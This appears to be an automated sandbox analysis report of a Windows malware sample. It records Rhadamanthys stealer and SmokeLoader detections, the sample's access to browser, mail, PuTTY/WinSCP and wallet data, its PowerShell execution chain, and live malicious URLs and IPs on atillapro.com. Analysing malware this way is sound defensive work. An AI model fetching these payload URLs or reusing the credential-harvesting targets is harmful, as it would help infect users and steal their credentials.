Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\thumbnails
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yiaxs5ej.default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality
barindex
Yara detected RHADAMANTHYS Stealer
Source: Yara match File source: 00000023.00000003.2810520451.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2809730416.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2986526967.0000000005095000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2222138286.0000024ABA9F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2775779398.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2105828144.0000000004DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2511978999.0000024ABABF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2179795455.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.3073347750.0000022CBCA81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3026163870.0000000004880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109261264.0000000003610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 22.2.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003ad060.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.0.gfiecjd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003bd080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.D4C0.vmt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.AppLaunch.exe.1ff003b4af0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.2788977995.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538928588.0000000000521000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2538295136.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2790746450.0000000001EB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\gfiecjd, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFF83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 13_3_00007DF488BFF83C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C314B8 socket,bind, 13_3_00007DF488C314B8
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005926B9 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_005926B9
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005919C2 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_005919C2
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1423732 Sample: xwREqjHUEv.exe Startdate: 10/04/2024 Architecture: WINDOWS Score: 100 65 atillapro.com 2->65 95 Multi AV Scanner detection for domain / URL 2->95 97 Found malware configuration 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 17 other signatures 2->101 15 xwREqjHUEv.exe 7 2->15         started        18 gfiecjd 2->18         started        21 Utsysc.exe 2->21         started        signatures3 process4 file5 57 C:\Users\user\temp.bat, DOS 15->57 dropped 59 C:\Users\user\start.vbs, ASCII 15->59 dropped 23 wscript.exe 1 15->23         started        73 Antivirus detection for dropped file 18->73 75 Multi AV Scanner detection for dropped file 18->75 77 Machine Learning detection for dropped file 18->77 79 4 other signatures 18->79 signatures6 process7 signatures8 103 Wscript starts Powershell (via cmd or directly) 23->103 105 Windows Scripting host queries suspicious COM object (likely to drop second stage) 23->105 107 Suspicious execution chain found 23->107 26 cmd.exe 2 23->26         started        process9 signatures10 109 Suspicious powershell command line found 26->109 111 Wscript starts Powershell (via cmd or directly) 26->111 113 Very long command line found 26->113 115 2 other signatures 26->115 29 powershell.exe 15 26->29         started        31 powershell.exe 16 26->31         started        35 conhost.exe 26->35         started        process11 file12 37 RegAsm.exe 1 29->37         started        61 C:\Users\user\UndLdl.ps1, Unicode 31->61 dropped 69 Suspicious execution chain found 31->69 71 Found suspicious powershell code related to unpacking or dynamic code loading 31->71 signatures13 process14 process15 39 dialer.exe 37->39         started        42 WerFault.exe 2 37->42         started        dnsIp16 67 216.250.255.115, 49705, 49713, 49714 AS-TIERP-19019US United States 39->67 44 OpenWith.exe 39->44         started        process17 signatures18 117 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 44->117 119 Tries to steal Mail credentials (via file / registry access) 44->119 121 Tries to harvest and steal Bitcoin Wallet information 44->121 47 AppLaunch.exe 5 44->47         started        process19 file20 63 C:\Users\user\AppData\Roaming\D4C0.vmt.exe, PE32 47->63 dropped 50 D4C0.vmt.exe 47->50         started        53 cmd.exe 47->53         started        process21 signatures22 81 Antivirus detection for dropped file 50->81 83 Multi AV Scanner detection for dropped file 50->83 85 Machine Learning detection for dropped file 50->85 93 2 other signatures 50->93 87 Suspicious powershell command line found 53->87 89 Wscript starts Powershell (via cmd or directly) 53->89 91 Adds a directory exclusion to Windows Defender 53->91 55 conhost.exe 53->55         started        process23
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
216.250.255.115
 unknown United States
19019 AS-TIERP-19019US false
185.196.8.137
 atillapro.com Switzerland
34888 SIMPLECARRER2IT true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
atillapro.com 185.196.8.137 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://atillapro.com/ true
  • 15%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://atillapro.com/vsdjcn3khS/Plugins/cred64.dll true
  • 20%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
atillapro.com/vsdjcn3khS/index.php true
  • 15%, Virustotal, Browse
  • Avira URL Cloud: malware
 low
http://atillapro.com/ true
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://atillapro.com/vsdjcn3khS/index.php?scr=1 true
  • 12%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://atillapro.com/vsdjcn3khS/index.php true
  • 15%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://atillapro.com/vsdjcn3khS/Plugins/clip64.dll true
  • 20%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown